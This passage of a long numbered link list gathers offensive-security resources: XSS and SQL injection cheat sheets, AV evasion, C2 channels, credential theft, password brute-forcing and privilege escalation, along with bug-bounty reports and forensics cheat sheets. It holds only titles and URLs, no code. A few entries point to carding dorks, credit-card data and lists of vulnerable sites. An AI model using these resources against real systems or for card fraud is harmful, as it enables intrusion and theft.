Injection:\n\n\nhttps://pentestlab.blog/2013/06/26/html-injection/\n\n\n-611-Meterpreter stage AV/IDS evasion with powershell:\n\n\nhttps://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/\n\n\n-612-Windows Atomic Tests by ATT&CK Tactic & Technique:\n\n\nhttps://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md\n\n\n-613-Windows Active Directory Post Exploitation Cheatsheet:\n\n\nhttps://medium.com/p/48c2bd70388\n\n\n-614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware:\n\n\nhttp://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml\n\n\n-615-How to Bypass Anti-Virus to Run Mimikatz:\n\n\nhttps://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/\n\n\n-616-Userland API Monitoring and Code Injection Detection:\n\n\nhttps://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565\n\n\n-617-USE TOR. USE EMPIRE.:\n\n\nhttp://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html\n\n-617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET:\n\n\nhttps://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/\n\n\n-618-Empire without PowerShell.exe:\n\n\nhttps://bneg.io/2017/07/26/empire-without-powershell-exe/\n\n\n-619-RED TEAM:\n\n\nhttps://bneg.io/category/red-team/\n\n\n-620-PDF Tools:\n\n\nhttps://blog.didierstevens.com/programs/pdf-tools/\n\n\n-621-DNS Data ex ltration — What is this and How to use?\n\n\nhttps://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822\n\n\n-621-Google Dorks:\n\n\nhttps://medium.com/p/7cfd432e0cf3\n\n\n-622-Hacking with JSP Shells:\n\n\nhttps://blog.netspi.com/hacking-with-jsp-shells/\n\n\n-623-Malware Analysis:\n\n\nhttps://github.com/RPISEC/Malware/raw/master/README.md\n\n\n-624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.:\n\n\nhttps://github.com/SandySekharan/CTF-tool\n\n\n-625-Group Policy Preferences:\n\n\nhttps://pentestlab.blog/2017/03/20/group-policy-preferences\n\n\n\n-627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES:\n\n\nhttps://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files\n\n\n-628-deobfuscation:\n\n\nhttps://furoner.wordpress.com/tag/deobfuscation/\n\n\n-629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE\nMACRO AND EVADING AVS:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/\n\n\n-630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/\n\n\n-631-GCAT – BACKDOOR EM PYTHON:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/\n\n\n-632-Latest Carding Dorks List for Sql njection 2019:\n\n\nhttps://latestechnews.com/carding-dorks/\n\n\n-633-google docs for credit card:\n\n\nhttps://latestechnews.com/tag/google-docs-for-credit-card/\n\n\n-634-How To Scan Multiple Organizations\nWith Shodan and Golang (OSINT):\n\n\nhttps://medium.com/p/d994ba6a9587\n\n-635-How to Evade Application\nWhitelisting Using REGSVR32:\n\n\nhttps://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/\n\n\n-636-phishing:\n\n\nhttps://www.blackhillsinfosec.com/tag/phishing/\n\n\n-637-Merlin in action: Intro to Merlin:\n\n\nhttps://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I\n\n\n-638-IP Cams from around the world:\n\n\nhttps://medium.com/p/a6f269f56805\n\n\n-639-Advanced Cross Site Scripting(XSS) Cheat Sheet by\nJaydeep Dabhi:\n\n\nhttps://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/\n\n\n-640-Just how easy it is to do a domain or\nsubdomain take over!?:\n\n\nhttps://medium.com/p/265d635b43d8\n\n\n-641-How to Create hidden user in Remote PC:\n\n\nhttp://www.hackingarticles.in/create-hidden-remote-metaspolit\n\n\n-642-Process Doppelgänging – a new way to impersonate a process:\n\n\nhttps://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/\n\n\n-643-How to turn a DLL into astandalone EXE:\n\n\nhttps://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/\n\n\n-644-Hijacking extensions handlers as a malware persistence method:\n\n\nhttps://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/\n\n\n-645-I'll Get Your Credentials ... Later!:\n\n\nhttps://www.fuzzysecurity.com/tutorials/18.html\n\n\n-646-Game Over: CanYouPwnMe > Kevgir-1:\n\n\nhttps://www.fuzzysecurity.com/tutorials/26.html\n\n\n-647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities:\n\n\nhttp://www.greyhathacker.net/?p=995\n\n\n-648-Getting started in Bug Bounty:\n\n\nhttps://medium.com/p/7052da28445a\n\n\n-649-Union SQLi Challenges (Zixem Write-up):\n\n\nhttps://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60\n\n\n-650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites:\n\n\nhttps://gbhackers.com/scanless-port-scans-websites-behalf\n\n\n-651-WEBAPP PENTEST:\n\n\nhttps://securityonline.info/category/penetration-testing/webapp-pentest/\n\n\n-652-Cross-Site Scripting (XSS) Payloads:\n\n\nhttps://securityonline.info/tag/cross-site-scripting-xss-payloads/\n\n\n-653-sg1: swiss army knife for data encryption, exfiltration & covert communication:\n\n\nhttps://securityonline.info/tag/sg1/\n\n\n-654-NETWORK PENTEST:\n\n\nhttps://securityonline.info/category/penetration-testing/network-pentest/\n\n\n-655-SQL injection in an UPDATE query - a bug bounty story!:\n\n\nhttps://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html\n\n\n-656-Cross-site Scripting:\n\n\nhttps://www.netsparker.com/blog/web-security/cross-site-scripting-xss/\n\n\n-657-Local File Inclusion:\n\n\nhttps://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/\n\n\n-658-Command Injection:\n\n\nhttps://www.netsparker.com/blog/web-security/command-injection-vulnerability/\n\n\n-659-a categorized list of Windows CMD commands:\n\n\nhttps://ss64.com/nt/commands.html\n\n\n-660-Understanding Guide for Nmap Timing Scan (Firewall Bypass):\n\n\nhttp://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass\n\n\n-661-RFID Hacking with The Proxmark 3:\n\n\nhttps://blog.kchung.co/tag/rfid/\n\n\n-662-A practical guide to RFID badge copying:\n\n\nhttps://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying\n\n\n-663-Denial of Service using Cookie Bombing:\n\n\nhttps://medium.com/p/55c2d0ef808c\n\n\n-664-Vultr Domain Hijacking:\n\n\nhttps://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking\n\n\n-665-Command and Control:\n\n\nhttps://vincentyiu.co.uk/red-team/domain-fronting\n\n\n-666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers:\n\n\nhttps://gbhackers.com/cisco-global-exploiter-cge\n\n\n-667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES:\n\n\nhttps://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files\n\n\n\n-668-Situational Awareness:\n\n\nhttps://pentestlab.blog/2018/05/28/situational-awareness/\n\n\n-669-Unquoted Service Path:\n\n\nhttps://pentestlab.blog/2017/03/09/unquoted-service-path\n\n\n-670-NFS:\n\n\nhttps://pentestacademy.wordpress.com/2017/09/20/nfs/\n\n\n-671-List of Tools for Pentest Rookies:\n\n\nhttps://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/\n\n\n-672-Common Windows Commands for Pentesters:\n\n\nhttps://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/\n\n\n-673-Open-Source Intelligence (OSINT) Reconnaissance:\n\n\nhttps://medium.com/p/75edd7f7dada\n\n\n-674-OSINT x UCCU Workshop on Open Source Intelligence:\n\n\nhttps://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence\n\n\n-675-Advanced Attack Techniques:\n\n\nhttps://www.cyberark.com/threat-research-category/advanced-attack-techniques/\n\n\n-676-Credential Theft:\n\n\nhttps://www.cyberark.com/threat-research-category/credential-theft/\n\n\n-678-The Cloud Shadow Admin Threat: 10 Permissions to Protect:\n\n\nhttps://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/\n\n\n-679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk:\n\n\nhttps://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/\n\n\n-680-Weakness Within: Kerberos Delegation:\n\n\nhttps://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/\n\n\n-681-Simple Domain Fronting PoC with GAE C2 server:\n\n\nhttps://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/\n\n\n-682-Find Critical Information about a Host using DMitry:\n\n\nhttps://www.thehackr.com/find-critical-information-host-using-dmitry/\n\n\n-683-How To Do OS Fingerprinting In Kali Using Xprobe2:\n\n\nhttp://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA\n\n\n-684-Crack SSH, FTP, Telnet Logins Using Hydra:\n\n\nhttps://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/\n\n\n-685-Reveal Saved Passwords in Browser using JavaScript Injection:\n\n\nhttps://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/\n\n\n-686-Nmap Cheat Sheet:\n\n\nhttps://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf\n\n\n-687-Manual Post Exploitation on Windows PC (Network Command):\n\n\n\nhttp://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command\n\n\n-688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool:\n\n\nhttp://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool\n\n\n-689-Hack Locked Workstation Password in Clear Text:\n\n\nhttp://www.hackingarticles.in/hack-locked-workstation-password-clear-text\n\n\n-690-How to Find ALL Excel, Office, PDF, and Images in Remote PC:\n\n\nhttp://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc\n\n\n-691-red-teaming:\n\n\nhttps://www.redteamsecure.com/category/red-teaming/\n\n\n-692-Create a Fake AP and Sniff Data mitmAP:\n\n\nhttp://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/\n\n\n-693-Bruteforcing From Nmap Output BruteSpray:\n\n\nhttp://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/\n\n\n-694-Reverse Engineering Framework radare2:\n\n\nhttp://www.uaeinfosec.com/reverse-engineering-framework-radare2/\n\n\n-695-Automated ettercap TCP/IP Hijacking Tool Morpheus:\n\n\nhttp://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/\n\n\n-696-List Of Vulnerable SQL Injection Sites:\n\n\nhttps://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199\n\n\n\n-697-Command and Control – Gmail:\n\n\nhttps://pentestlab.blog/2017/08/03/command-and-control-gmail/\n\n\n-698-Command and Control – DropBox:\n\n\nhttps://pentestlab.blog/2017/08/29/command-and-control-dropbox/\n\n\n-699-Skeleton Key:\n\n\nhttps://pentestlab.blog/2018/04/10/skeleton-key/\n\n\n-700-Secondary Logon Handle:\n\n\nhttps://pentestlab.blog/2017/04/07/secondary-logon-handle\n\n\n-701-Hot Potato:\n\n\nhttps://pentestlab.blog/2017/04/13/hot-potato\n\n\n-702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):\n\n\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\n\n\n-703-Linux-Kernel-exploits:\n\n\nhttp://tacxingxing.com/category/exploit/kernel-exploit/\n\n\n-704-Linux-Kernel-Exploit Stack Smashing:\n\n\nhttp://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/\n\n\n-705-Linux Kernel Exploit Environment:\n\n\nhttp://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/\n\n\n-706-Linux-Kernel-Exploit NULL dereference:\n\n\nhttp://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/\n\n\n-707-Apache mod_python for red teams:\n\nhttps://labs.nettitude.com/blog/apache-mod_python-for-red-teams/\n\n\n-708-Bounty Write-up (HTB):\n\n\nhttps://medium.com/p/9b01c934dfd2/\n\n\n709-CTF Writeups:\n\n\nhttps://medium.com/ctf-writeups\n\n\n-710-Detecting Malicious Microsoft Office Macro Documents:\n\n\nhttp://www.greyhathacker.net/?p=872\n\n\n\n-711-SQL injection in Drupal:\n\n\n\nhttps://hackerone.com/reports/31756\n\n\n-712-XSS and open redirect on Twitter:\n\n\nhttps://hackerone.com/reports/260744\n\n\n\n-713-Shopify login open redirect:\n\n\nhttps://hackerone.com/reports/55546\n\n\n-714-HackerOne interstitial redirect:\n\n\nhttps://hackerone.com/reports/111968\n\n\n-715-Ubiquiti sub-domain takeovers:\n\n\nhttps://hackerone.com/reports/181665\n\n\n-716-Scan.me pointing to Zendesk:\n\n\nhttps://hackerone.com/reports/114134\n\n\n-717-Starbucks' sub-domain takeover:\n\n\nhttps://hackerone.com/reports/325336\n\n\n-718-Vine's sub-domain takeover:\n\n\nhttps://hackerone.com/reports/32825\n\n\n-719-Uber's sub-domain takeover:\n\n\nhttps://hackerone.com/reports/175070\n\n\n\n-720-Read access to Google:\n\n\nhttps://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/\n\n\n-721-A Facebook XXE with Word:\n\n\nhttps://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/\n\n\n-722-The Wikiloc XXE:\n\n\nhttps://www.davidsopas.com/wikiloc-xxe-vulnerability/\n\n\n-723-Uber Jinja2 TTSI:\n\n\nhttps://hackerone.com/reports/125980\n\n\n-724-Uber Angular template injection:\n\n\nhttps://hackerone.com/reports/125027\n\n\n-725-Yahoo Mail stored XSS:\n\n\nhttps://klikki.fi/adv/yahoo2.html\n\n\n-726-Google image search XSS:\n\n\nhttps://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html\n\n\n-727-Shopify Giftcard Cart XSS :\n\n\nhttps://hackerone.com/reports/95089\n\n\n-728-Shopify wholesale XSS :\n\n\nhttps://hackerone.com/reports/106293\n\n\n-729-Bypassing the Shopify admin authentication:\n\n\nhttps://hackerone.com/reports/270981\n\n\n-730-Starbucks race conditions:\n\n\nhttps://sakurity.com/blog/2015/05/21/starbucks.html\n\n\n-731-Binary.com vulnerability – stealing a user's money:\n\n\nhttps://hackerone.com/reports/98247\n\n\n-732-HackerOne signal manipulation:\n\n\nhttps://hackerone.com/reports/106305\n\n\n-733-Shopify S buckets open:\n\n\nhttps://hackerone.com/reports/98819\n\n\n-734-HackerOne S buckets open:\n\n\nhttps://hackerone.com/reports/209223\n\n\n-735-Bypassing the GitLab 2F authentication:\n\n\nhttps://gitlab.com/gitlab-org/gitlab-ce/issues/14900\n\n\n-736-Yahoo PHP info disclosure:\n\n\nhttps://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/\n\n\n-737-Shopify for exporting installed users:\n\n\nhttps://hackerone.com/reports/96470\n\n\n-738-Shopify Twitter disconnect:\n\n\nhttps://hackerone.com/reports/111216\n\n\n-739-Badoo full account takeover:\n\n\nhttps://hackerone.com/reports/127703\n\n\n-740-Disabling PS Logging:\n\n\nhttps://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs\n\n\n-741-macro-less-code-exec-in-msword:\n\n\nhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n\n\n-742-5 ways to Exploiting PUT Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit\n\n\n-743-5 Ways to Exploit Verb Tempering Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability\n\n\n-744-5 Ways to Hack MySQL Login Password:\n\n\nhttp://www.hackingarticles.in/5-ways-to-hack-mysql-login-password\n\n\n-745-5 Ways to Hack SMB Login Password:\n\n\nhttp://www.hackingarticles.in/5-ways-to-hack-smb-login-password\n\n\n-746-6 Ways to Hack FTP Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-ftp-login-password\n\n\n-746-6 Ways to Hack SNMP Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-snmp-password\n\n\n-747-6 Ways to Hack VNC Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-vnc-login-password\n\n\n-748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter:\n\n\nhttp://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter\n\n\n-749-Beginner Guide to IPtables:\n\n\nhttp://www.hackingarticles.in/beginner-guide-iptables\n\n\n-750-Beginner Guide to impacket Tool kit:\n\n\nhttp://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit\n\n\n-751-Exploit Remote Windows 10 PC using Discover Tool:\n\n\nhttp://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool\n\n\n-752-Forensics Investigation of Remote PC (Part 2):\n\n\nhttp://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2\n\n\n-753-5 ways to File upload vulnerability Exploitation:\n\n\nhttp://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation\n\n\n-754-FTP Penetration Testing in Ubuntu (Port 21):\n\n\nhttp://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21\n\n\n-755-FTP Penetration Testing on Windows (Port 21):\n\n\nhttp://www.hackingarticles.in/ftp-penetration-testing-windows\n\n\n-756-FTP Pivoting through RDP:\n\n\nhttp://www.hackingarticles.in/ftp-pivoting-rdp\n\n\n-757-Fun with Metasploit Payloads:\n\n\nhttp://www.hackingarticles.in/fun-metasploit-payloads\n\n\n-758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC:\n\n\nhttp://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc\n\n\n-759-Generating Reverse Shell using Msfvenom (One Liner Payload):\n\n\nhttp://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload\n\n\n-760-Generating Scan Reports Using Nmap (Output Scan):\n\n\nhttp://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan\n\n\n-761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled):\n\n\nhttp://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled\n\n\n-762-Hack ALL Security Features in Remote Windows 7 PC:\n\n\nhttp://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc\n\n\n-763-5 ways to Exploit LFi Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability\n\n\n-764-5 Ways to Directory Bruteforcing on Web Server:\n\n\nhttp://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server\n\n\n-765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit:\n\n\nhttp://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit\n\n\n-766-Hack Gmail and Facebook Password in Network using Bettercap:\n\n\nhttp://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap\n\n\n-767-ICMP Penetration Testing:\n\n\nhttp://www.hackingarticles.in/icmp-penetration-testing\n\n\n-768-Understanding Guide to Mimikatz:\n\n\nhttp://www.hackingarticles.in/understanding-guide-mimikatz\n\n\n-769-5 Ways to Create Dictionary for Bruteforcing:\n\nhttp://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing\n\n\n-770-Linux Privilege Escalation using LD_Preload:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/\n\n\n-771-2 Ways to Hack Remote Desktop Password using kali Linux:\n\n\nhttp://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux\n\n\n-772-2 ways to use Msfvenom Payload with Netcat:\n\n\nhttp://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat\n\n\n-773-4 ways to Connect Remote PC using SMB Port:\n\n\nhttp://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port\n\n\n-774-4 Ways to DNS Enumeration:\n\n\nhttp://www.hackingarticles.in/4-ways-dns-enumeration\n\n\n-775-4 Ways to get Linux Privilege Escalation:\n\n\nhttp://www.hackingarticles.in/4-ways-get-linux-privilege-escalation\n\n\n-776-101+ OSINT Resources for Investigators [2019]:\n\n\nhttps://i-sight.com/resources/101-osint-resources-for-investigators/\n\n\n-777-Week in OSINT #2019–02:\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f\n\n\n-778-OSINT Cheat Sheet:\n\n\nhttps://hack2interesting.com/osint-cheat-sheet/\n\n\n-779-OSINT Cheat Sheet:\n\n\nhttps://infoskirmish.com/osint-cheat-sheet/\n\n\n-780-OSINT Links for Investigators:\n\nhttps://i-sight.com/resources/osint-links-for-investigators/\n\n\n-781- Metasploit Cheat Sheet :\n\n\nhttps://www.kitploit.com/2019/02/metasploit-cheat-sheet.html\n\n\n-782- Exploit Development Cheat Sheet:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4\n\n\n-783-Building Profiles for a Social Engineering Attack:\n\n\nhttps://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/\n\n\n-784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes):\n\n\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\n\n\n-785-Getting the goods with CrackMapExec: Part 2:\n\n\nhttps://byt3bl33d3r.github.io/tag/crackmapexec.html\n\n\n-786-Bug Hunting Methodology (part-1):\n\n\nhttps://medium.com/p/91295b2d2066\n\n-787-Exploring Cobalt Strike's ExternalC2 framework:\n\n\nhttps://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/\n\n\n-788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities:\n\n\nhttps://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/\n\n\n-789-Adversarial Tactics, Techniques & Common Knowledge:\n\n\nhttps://attack.mitre.org/wiki/Main_Page\n\n\n-790-Bug Bounty — Tips / Tricks / JS (JavaScript Files):\n\n\nhttps://medium.com/p/bdde412ea49d\n\n\n-791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition):\n\n\nhttps://medium.com/p/f88a9f383fcc\n\n\n\n-792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory\nDatabase Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n-793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:\n\n\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n\n\n-794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution:\n\n\nhttps://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/\n\n\n-795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):\n\n\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\n\n\n-796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n-797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:\n\n\nhttps://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/\n\n\n-798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n\n-799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement:\n\n\nhttps://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/\n\n\n-800-Capcom Rootkit Proof-Of-Concept:\n\n\nhttps://www.fuzzysecurity.com/tutorials/28.html\n\n\n-801-Linux Privilege Escalation using Misconfigured NFS:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/\n\n\n-802-Beginners Guide for John the Ripper (Part 1):\n\n\nhttp://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/\n\n\n-803-Working of Traceroute using Wireshark:\n\n\nhttp://www.hackingarticles.in/working-of-traceroute-using-wireshark/\n\n\n-804-Multiple Ways to Get root through Writable File:\n\n\nhttp://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/\n\n\n-805-4 ways to SMTP Enumeration:\n\n\nhttp://www.hackingarticles.in/4-ways-smtp-enumeration\n\n\n-806-4 ways to Hack MS SQL Login Password:\n\n\nhttp://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password\n\n\n-807-4 Ways to Hack Telnet Passsword:\n\n\nhttp://www.hackingarticles.in/4-ways-to-hack-telnet-passsword\n\n\n-808-5 ways to Brute Force Attack on WordPress Website:\n\n\nhttp://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website\n\n\n-809-5 Ways to Crawl a Website:\n\n\nhttp://www.hackingarticles.in/5-ways-crawl-website\n\n\n-810-Local Linux Enumeration & Privilege Escalation Cheatsheet:\n\n\nhttps://www.rebootuser.com/?p=1623\n\n\n-811-The Drebin Dataset:\n\n\nhttps://www.sec.cs.tu-bs.de/~danarp/drebin/download.html\n\n\n-812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else:\n\n\nhttps://www.slideshare.net/x00mario/es6-en\n\n\n-813-IT and Information Security Cheat Sheets:\n\n\nhttps://zeltser.com/cheat-sheets/\n\n\n-814-Cheat Sheets - DFIR Training:\n\n\nhttps://www.dfir.training/cheat-sheets\n\n\n-815-WinDbg Malware Analysis Cheat Sheet:\n\n\nhttps://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/\n\n\n-819-Cheat Sheet for Analyzing Malicious Software:\n\n\nhttps://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/\n\n\n-820-Analyzing Malicious Documents Cheat Sheet - Prodefence:\n\n\nhttps://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/\n\n\n-821-Cheat Sheets - SANS Digital Forensics:\n\n\nhttps://digital-forensics.sans.org/community/cheat-sheets\n\n\n-822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:\n\n\nhttps://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/\n\n\n-823-Windows Registry Auditing Cheat Sheet:\n\n\nhttps://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology\n\n\n-824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know:\n\n\nhttps://kennyvn.com/cheatsheet-useful-bash-commands-linux/\n\n\n-825-kali-linux-cheatsheet:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition):\n\n\nhttps://securedyou.com/best-kali-linux-commands-terminal-hacking/\n\n\n-827-Kali Linux Commands Cheat Sheet:\n\n\nhttps://www.pinterest.com/pin/393431717429496576/\n\n\n-827-Kali Linux Commands Cheat Sheet A To Z:\n\n\nhttps://officialhacker.com/linux-commands-cheat-sheet/\n\n\n-828-Linux commands CHEATSHEET for HACKERS:\n\n\nhttps://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/\n\n\n-829-100 Linux Commands – A Brief Outline With Cheatsheet:\n\n\nhttps://fosslovers.com/100-linux-commands-cheatsheet/\n\n\n-830-Kali Linux – Penetration Testing Cheat Sheet:\n\n\nhttps://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/\n\n\n\n-831-Basic Linux Terminal Shortcuts Cheat Sheet :\n\n\nhttps://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/\n\n\n-832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} :\n\n\nhttps://itechhacks.com/kali-linux-and-linux-commands/\n\n\n-833-Transferring files from Kali to Windows (post 